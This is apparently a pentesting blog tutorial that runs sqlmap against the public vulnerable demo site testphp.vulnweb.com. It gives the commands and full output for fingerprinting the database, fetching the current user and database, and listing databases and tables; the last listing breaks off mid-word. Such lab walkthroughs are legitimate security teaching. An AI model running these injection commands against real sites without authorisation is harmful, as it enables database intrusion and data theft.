We have been using lot of tools for sqlinjection while Pentesting today we will see how to use SQLMap a Open source Database Fingerprinting tool which works without much of the false positives,we will test this tool on http://testphp.vulnweb.com demo site.

  1. Database Fingerprinting

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1

sqlmap/0.9-dev – automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net[*] starting at: 11:52:47

[11:52:47] [INFO] using ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’ as session file
[11:52:47] [INFO] resuming injection point ‘GET’ from session file
[11:52:47] [INFO] resuming injection parameter ‘cat’ from session file
[11:52:47] [INFO] resuming injection type ‘numeric’ from session file
[11:52:47] [INFO] resuming match ratio ’0.701′ from session file
[11:52:47] [INFO] resuming 0 number of parenthesis from session file
[11:52:47] [INFO] resuming back-end DBMS ‘mysql 5′ from session file
[11:52:47] [INFO] testing connection to the target url
[11:52:48] [INFO] testing for parenthesis on injectable parameter
[11:52:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5[*] shutting down at: 11:52:48

2)Finding the Database name and current user.


./sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 –current-db –current-user

sqlmap/0.9-dev – automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net[*] starting at: 11:57:13

[11:57:13] [INFO] using ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’ as session file
[11:57:13] [INFO] resuming injection point ‘GET’ from session file
[11:57:13] [INFO] resuming injection parameter ‘cat’ from session file
[11:57:13] [INFO] resuming injection type ‘numeric’ from session file
[11:57:13] [INFO] resuming match ratio ’0.701′ from session file
[11:57:13] [INFO] resuming 0 number of parenthesis from session file
[11:57:13] [INFO] resuming back-end DBMS ‘mysql 5′ from session file
[11:57:13] [INFO] testing connection to the target url
[11:57:17] [INFO] testing for parenthesis on injectable parameter
[11:57:17] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5
[11:57:17] [INFO] fetching current user
[11:57:17] [INFO] retrieved: acuart@localhost
current user:    ‘acuart@localhost’

[11:58:45] [INFO] fetching current database
[11:58:45] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’: acuart
current database:    ‘acuart’

[11:58:45] [INFO] Fetched data logged to text files under ‘/pentest/database/sqlmap/output/testphp.vulnweb.com’[*] shutting down at: 11:58:45

3) Enumerate Databases

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 –dbs

sqlmap/0.9-dev – automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net[*] starting at: 12:00:57

[12:00:58] [INFO] using ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’ as session file
[12:00:58] [INFO] resuming injection point ‘GET’ from session file
[12:00:58] [INFO] resuming injection parameter ‘cat’ from session file
[12:00:58] [INFO] resuming injection type ‘numeric’ from session file
[12:00:58] [INFO] resuming match ratio ’0.701′ from session file
[12:00:58] [INFO] resuming 0 number of parenthesis from session file
[12:00:58] [INFO] resuming back-end DBMS ‘mysql 5′ from session file
[12:00:58] [INFO] testing connection to the target url
[12:00:58] [INFO] testing for parenthesis on injectable parameter
[12:00:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5
[12:00:58] [INFO] fetching database names
[12:00:58] [INFO] fetching number of databases
[12:00:58] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’: 3
[12:00:58] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’: information_schema
[12:00:58] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’: acuart
[12:00:58] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’: modrewriteShop
available databases [3]:[*] acuart[*] information_schema[*] modrewriteShop

[12:00:58] [INFO] Fetched data logged to text files under ‘/pentest/database/sqlmap/output/testphp.vulnweb.com’[*] shutting down at: 12:00:58
4) Enumerate Database tables and Columns

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 –tables –columns

sqlmap/0.9-dev – automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[*] starting at: 12:03:27

[12:03:27] [INFO] using ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’ as session file
[12:03:27] [INFO] resuming injection point ‘GET’ from session file
[12:03:27] [INFO] resuming injection parameter ‘cat’ from session file
[12:03:27] [INFO] resuming injection type ‘numeric’ from session file
[12:03:27] [INFO] resuming match ratio ’0.701′ from session file
[12:03:27] [INFO] resuming 0 number of parenthesis from session file
[12:03:27] [INFO] resuming back-end DBMS ‘mysql 5′ from session file
[12:03:27] [INFO] testing connection to the target url
[12:03:28] [INFO] testing for parenthesis on injectable parameter
[12:03:28] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5
[12:03:28] [INFO] fetching tables
[12:03:28] [INFO] fetching database names
[12:03:28] [INFO] fetching number of databases
[12:03:28] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’: 3
[12:03:28] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’: information_schema
[12:03:28] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’: acuart
[12:03:28] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’: modrewriteShop
[12:03:28] [INFO] fetching number of tables for database ‘information_schema’
[12:03:28] [INFO] retrieved: 16
[12:03:37] [INFO] retrieved: CHARACTER_SETS
[12:04:52] [INFO] retrieved: COLLATI

It was So easy from this tool to enumerate the details next i will be telling on using sqlmap for Advanced techniques